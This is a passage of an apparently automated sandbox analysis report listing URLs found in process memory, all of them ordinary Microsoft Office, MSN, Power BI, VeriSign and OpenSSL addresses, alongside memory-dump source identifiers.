    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
    Source: 872C.tmp, 00000003.00000003.1389030539.0000000003CF3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.veris
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060999948.00000248C3221000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2041372305.00000248C3212000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392259764.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430663111.0000000003E62000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040166135.00000248C3297000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047506368.00000248C32DF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2061686160.00000248C374F000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057452271.00000248C0D4D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2012043324.00000248C2AB8000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014708508.00000248C2AE5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C329A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053909673.00000248C2D2C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057344669.00000248C0D3D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051644364.00000248C2AD0000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2042986382.00000248C32A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430663111.0000000003E62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EC8000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.18526.20
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.netO
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glideser
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesff
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxing
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspxs/3.28
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlwbRAND_get_rand_methodRAND_init_fipsSSLEAY_RAND_BYTESPRNG
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloads
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadsentsI
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticatedd
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticatedp
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015814653.00000248C31A5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051883076.00000248C31B2000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled1
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledMBI_SSL_SHORT
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C31F9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query3
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/entitlement/querybled#
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388436799.0000000003D26000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388768349.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removegets
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query43
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014678463.00000248C0D50000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051684418.00000248C2D66000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2016612588.00000248C2D7B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051267653.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057482704.00000248C0D52000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2059927373.00000248C2D7D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api/ios/T
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiation-
